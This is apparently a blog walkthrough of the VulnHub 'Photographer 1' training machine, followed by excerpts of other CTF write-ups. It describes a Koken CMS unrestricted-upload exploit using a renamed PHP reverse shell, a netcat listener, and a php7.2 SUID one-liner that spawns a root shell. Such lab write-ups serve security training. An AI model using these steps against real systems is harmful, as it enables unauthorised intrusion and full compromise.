Skip to main content

VULNHUB PHOTOGRAPHER - 1 WALK-THROUGH

Welcome to the walkthrough of Photographer 1 presented by VulnHub, a boot-to-root machine which focuses on Koken CMS unrestricted file upload vulnerability leading to RCE. The vulnerable machine can be downloaded from here.

Hints for machine.

  1. Netdiscover, Nmap
  2. Port 8000 Koken CMS
  3. Smbclient
  4. Php file upload
  5. Shell
  6. Finding SUID - php7.2
  7. Privilege Escalation

Walkthrough:

# Finding IP address

Once the machine is deployed the first task is to obtain its IP address. We will use tool named netdiscover to discover all the IPs in our internal network 

Command is

sudo netdiscover -i eth0

Since no other virtual machine is up, this seems like the IP address of the victim.

# Nmap scan

As usual we start with basic nmap scan.

Command is

sudo nmap -sC -sV -T4 <IP>

Command details

  • sudo – to run with root privileges
  • -sC – running default scripts
  • -sV – Version/Services info
  • -T4 – faster execution

Looking at the results we have a higher port 8000 open that is running Koken, port 139 and 445 running samba and port 80 with default Apache webpage.

# Port 8000 enumeration

We know it’s running Koken CMS version 0.22.24, lets quickly search for a exploit using searchsploit for given version.

Command

searchsploit Koken 0.22.24

We have one exploit. To copy the exploit either you download it from browser or just mirror it to your current directory using the command 

searchsploit -m php/webapps/48706.txt

Before moving forward and using any exploit I like to do basic enumeration of the exploit itself. Since this exploit requires Authentication, we need credentials for login as well as we don’t know how to access the login page. Understanding the exploit code comes in handy, the exploit gives us a directory named /admin which is a login form.

I tried some default creds but did not work.

# Port 139 and 445 – Smbclient

Smbclient is similar to ftp and is used to access resources from server.

To list the shares, we use the command

smbclient -L ////<IP>

To access a share, we use the command (-N for accessing shares without password).

smbclient -N //<IP>/sambashare

There are two files. Let’s download these to our machine using command get.

I tried to analyze the backup zip but it was a rabbit hole.

Reading the content of mailsent.txt using cat command.

This file gives us lots of information like emails and possible username. The last line gives us a secret “babygirl”, maybe it’s a password.

I tried login with [email protected]:babygirl and got logged in successfully.

Now we follow the exploit process.

Fire up burp suite and we will intercept the request. First, we click on “Import content” button present in bottom right corner. 

I used php reverse shell from Payload All the Things and changed the extension to jpg to upload and turn on the burp to intercept this request.

After intercepting the request in burp, change the extension back to php and the forward the request. 

The shell has been uploaded. To access it we mouse-over to “Download File” button on top right corner and open it in new tab.

But before that we need a listener to catch our reverse shell. You can use tools like pwncat, msf-handler or netcat to catch the reverse shell.

Use command nc -nvlp 1234 to start a netcat listener.

Opening the php reverse shell file, we get a connection back. We are a low privileged user as of now.

Before any further enumeration lets stabilize our shell.

Command is

python3 -c “import pty;pty.spawn(‘/bin/bash’)”

 ## Privilege Escalation using SUID binaries

To find SUID binaries we use a liner command

find / -perm -4000 2>/dev/null

There is a SUID that's can be used for privilege escalation - php7.2

Use the command 

/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"

 And now we are root.

Pretty easy machine, main focus was on Koken CMS upload functionality.


Thanks for reading !

Comments

Post a Comment

Popular posts from this blog

KIOPTRIX LEVEL 1 WALKTHROUGH WITH AND WITHOUT METASPLOIT

Kioptrix Level 1 is a beginner level CTF challenge. You can download this virtual machine from here .  Details of Kioptrix : Size----186 MB OS---Linux Note: In virtual box, set up a Bridged network (virtual box -> preferences -> network) in networking, put both your Kali and Kioptrix to Bridged network. Fire-up both the machines(Kali and Kioptrix Level 1) Kioptrix will ask for the logins which we don't know at the moment. This also means we can't find IP of the Kioptrix directly from the Kioptrix machine itself. Leave the Kioptrix machine as it is and switch to Kali. First we need to find the IP address of the Kioptrix machine. We will use the tool netdiscover that comes pre-installed in Kali Linux to identify the IP address. Command   sudo netdiscover -i eth0 Wait  for scan results. 192.168.233.130 seems to be the IP of the Kioptrix machine. Let's scan this IP address using the tool Nmap (scan will also verify that its the IP of Kioptrix machine) Command  sudo nmap
1 comment
Read more

HTB GRANDPA WALKTHROUGH

HackTheBox  is an excellent platform for various pen-testers to increase their testing skills and knowledge. Machine Level -Easy Machine Name -Grandpa Machine OS -Windows Machine IP -10.10.10.14 Tools: Nmap  -Nmap is a fantastic tools for scanning the open ports, services and OS detection. You can use other tools other than nmap (which ever you are more comfortable with ) like masscan, SPARTA etc to scan for open ports. Metasploit  -One of the most common and widely used tool by pen-testers to launch exploits, it is maintained by Rapid 7 . Many books are available to understand the features of this tool. Method : Scanning the machine is the first step(i.e. Enumeration). We use the following nmap command, sudo nmap -T4 -p- -A 10.10.10.14 The command  scans for all ports(-p-) with threads speed 4 (-T4) and also gives you version details  (-A). So, only port 80 is open. Its says its running Microsoft IIS 6.0 , but first lets visit the victim's IP and see what's there
Post a Comment
Read more

VULNHUB INFOSEC PREP : OSCP

Welcome to the walkthrough of InfoSec Prep: OSCP walkthrough. It is a beginner-level boot2root machine and it can be downloaded from  here . I cracked this machine literally 5 minutes after it booted properly. So you can consider this machine the easiest.  Hint: Nmap Finding secret.txt and decoding it. Login via ssh. Privilege escalation to root via SUID binary.  Boot up the machine and it should show the IP address. We start off by pinging the box to verify that the box is up and running and we can reach out to it. Command: ping <IP> Then we can run Nmap scan to look for open ports and services running on the box. We will use -sC for running default scripts, -sV for Version/Service info and -T4 for faster execution, and -o for saving the result on a file named nmap The command is: sudo nmap -sC -sV -T4 <IP> -o filename Looking at the scan results, port 22 is open and running ssh, and port 80 is open, and it's running Apache. We can also see a directory named secret.txt
Post a Comment
Read more